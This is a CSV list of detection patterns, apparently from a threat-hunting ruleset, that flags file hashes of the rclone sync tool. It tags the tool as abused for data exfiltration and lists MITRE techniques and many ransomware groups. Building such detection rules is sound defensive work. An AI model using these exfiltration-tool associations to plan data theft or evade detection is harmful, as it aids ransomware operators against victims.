"*d57d7f7d9c174ed17d734fad8135900934b3b8a347743c0432f931b784be1d63*",".{0,1000}d57d7f7d9c174ed17d734fad8135900934b3b8a347743c0432f931b784be1d63.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d599ad55cf5281a8c69770267785aa5c72467bcd91e0a39f0e78a76723c32802*",".{0,1000}d599ad55cf5281a8c69770267785aa5c72467bcd91e0a39f0e78a76723c32802.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d5a69f708787b96bd6ec795b073a7bffe4d440bc64817e3a5b8e9fab9a9f8244*",".{0,1000}d5a69f708787b96bd6ec795b073a7bffe4d440bc64817e3a5b8e9fab9a9f8244.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d5c8a0366f1da07c7f8fee1ca50a96991c9e8e9dbcf9b45ce09c1018616172d3*",".{0,1000}d5c8a0366f1da07c7f8fee1ca50a96991c9e8e9dbcf9b45ce09c1018616172d3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d5e9c1240d27ba95d119b00be2319999d9113b754c36e238f8b5151330834fa5*",".{0,1000}d5e9c1240d27ba95d119b00be2319999d9113b754c36e238f8b5151330834fa5.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d63a94ec88f903d6bf9a4912276133242b569d0308b2f4ba29b3cfa786ce46d1*",".{0,1000}d63a94ec88f903d6bf9a4912276133242b569d0308b2f4ba29b3cfa786ce46d1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d64a88d7358e05461e8a42520e7c56dc7220c0320495213333ff91ff3b5274d2*",".{0,1000}d64a88d7358e05461e8a42520e7c56dc7220c0320495213333ff91ff3b5274d2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d71402e86412d4e7a04585f68e9945454cecdac2c3e6d95ba000b8809109e7ff*",".{0,1000}d71402e86412d4e7a04585f68e9945454cecdac2c3e6d95ba000b8809109e7ff.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d72df0b6f38c46c3a730b2a16cb073e4b454e3da73d929298b4c342165f670f6*",".{0,1000}d72df0b6f38c46c3a730b2a16cb073e4b454e3da73d929298b4c342165f670f6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d76e6248bbbac71a6066ad5c2e1908971c04e82db9ec2b14024c5bd8256a0e16*",".{0,1000}d76e6248bbbac71a6066ad5c2e1908971c04e82db9ec2b14024c5bd8256a0e16.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d76ff4ce0fd6ea09c3585da889e833b060e62752d4459e0982805596ceb1f4d0*",".{0,1000}d76ff4ce0fd6ea09c3585da889e833b060e62752d4459e0982805596ceb1f4d0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d7f98934b1bf71960575a07e022836d6d9d68919885a0766b52c50d30cfa926c*",".{0,1000}d7f98934b1bf71960575a07e022836d6d9d68919885a0766b52c50d30cfa926c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d83e8652c11bd2324721eaf55a2308c71be9233ef15ce72ce06c3e9fedab6320*",".{0,1000}d83e8652c11bd2324721eaf55a2308c71be9233ef15ce72ce06c3e9fedab6320.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d86d0e7d28948669b8180e8e16ae68db0fd794e918842ac4a21c58b8f41b75ee*",".{0,1000}d86d0e7d28948669b8180e8e16ae68db0fd794e918842ac4a21c58b8f41b75ee.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d8902a73e518bf15abfd269a8e75d3aac0965e09a185f0aef9c99ef3e903bdac*",".{0,1000}d8902a73e518bf15abfd269a8e75d3aac0965e09a185f0aef9c99ef3e903bdac.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d8e28bded459511fc27e300d88c4bee0fda36e7e6222d6d9b9a32e5986163881*",".{0,1000}d8e28bded459511fc27e300d88c4bee0fda36e7e6222d6d9b9a32e5986163881.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d8ff06a0103bf12f790b0c95c41a7c5907d48d1d11a8e68ba2f4b78129a28d30*",".{0,1000}d8ff06a0103bf12f790b0c95c41a7c5907d48d1d11a8e68ba2f4b78129a28d30.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d90f7f2b3421cf2f3342f143358dcbeed09ce2580338f184b31c79ab4a24a5de*",".{0,1000}d90f7f2b3421cf2f3342f143358dcbeed09ce2580338f184b31c79ab4a24a5de.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*d9aebc560abab311a8fe955f4e01952d542e033c368751f892dfa69f504b1eab*",".{0,1000}d9aebc560abab311a8fe955f4e01952d542e033c368751f892dfa69f504b1eab.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*da0f02b6a9829a8719731e156b78f7a647075d53d48d784ba530a2477f76f263*",".{0,1000}da0f02b6a9829a8719731e156b78f7a647075d53d48d784ba530a2477f76f263.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*da1645fa73088118140bdcc6e29203194532b81a7653a17632e3bf191a41a372*",".{0,1000}da1645fa73088118140bdcc6e29203194532b81a7653a17632e3bf191a41a372.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*da638646b76966fe9ba2ab4a49aa9fa74324e58d5abaec2ebf9657069a905699*",".{0,1000}da638646b76966fe9ba2ab4a49aa9fa74324e58d5abaec2ebf9657069a905699.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*db195f43c7e99cd90369d0598c414025df797c3496e8dd9299162fae7d013833*",".{0,1000}db195f43c7e99cd90369d0598c414025df797c3496e8dd9299162fae7d013833.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*db3860e4549af28d87aa83f2035a57c5d081b179e40d4c828db19c3c3545831e*",".{0,1000}db3860e4549af28d87aa83f2035a57c5d081b179e40d4c828db19c3c3545831e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*dbddf4f46acf5b70e2885afac12a8c7caca7f3ea2d431011050635441869131f*",".{0,1000}dbddf4f46acf5b70e2885afac12a8c7caca7f3ea2d431011050635441869131f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*dbe8f08cde1240ef9425df1a9412d4810d1bc9cbeada6b4129da15492e118af1*",".{0,1000}dbe8f08cde1240ef9425df1a9412d4810d1bc9cbeada6b4129da15492e118af1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*dc11292f98803ea780d812c6a0cb957a303f0668f36a0fbdf08196c6458a12cc*",".{0,1000}dc11292f98803ea780d812c6a0cb957a303f0668f36a0fbdf08196c6458a12cc.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*dc2112e7872f7aabd0548c2c74bcb3c09abda32da66efa287a4c7d5b305bdc6f*",".{0,1000}dc2112e7872f7aabd0548c2c74bcb3c09abda32da66efa287a4c7d5b305bdc6f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*dc3544d369e57c44211b4d294186038898043b1b872c4204bf01513bf0635ecf*",".{0,1000}dc3544d369e57c44211b4d294186038898043b1b872c4204bf01513bf0635ecf.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*dc3934092975417bf1fb22470daa452b7c1e8aeb82984fe2afb83bc3ea090198*",".{0,1000}dc3934092975417bf1fb22470daa452b7c1e8aeb82984fe2afb83bc3ea090198.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*dc91864dd189d8c80a0af5d1ec1078cf26fd921967938a04e55fbf1987871944*",".{0,1000}dc91864dd189d8c80a0af5d1ec1078cf26fd921967938a04e55fbf1987871944.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*dd01f5fd5874d12b64228e10f0e91d849837797160d83b91ad230c3caaa40ff6*",".{0,1000}dd01f5fd5874d12b64228e10f0e91d849837797160d83b91ad230c3caaa40ff6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*dd174e6ae3e31d412415793d6673f25c1ea4fac29a8893fe28ff378a928d1c0f*",".{0,1000}dd174e6ae3e31d412415793d6673f25c1ea4fac29a8893fe28ff378a928d1c0f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*dd177de3063581532bfbdb69d3e9fd8e14ceb99c6024b8b834f3ee39a41c4e51*",".{0,1000}dd177de3063581532bfbdb69d3e9fd8e14ceb99c6024b8b834f3ee39a41c4e51.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*dd2eb9c46d44cf9f19ebc8f66878d1d83d57577e2db6385e16df68a28557cd89*",".{0,1000}dd2eb9c46d44cf9f19ebc8f66878d1d83d57577e2db6385e16df68a28557cd89.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*dd53ac86689c6ca265dd0d8f1034e7abd37a250cb947cb086c7118696d4e3ec3*",".{0,1000}dd53ac86689c6ca265dd0d8f1034e7abd37a250cb947cb086c7118696d4e3ec3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
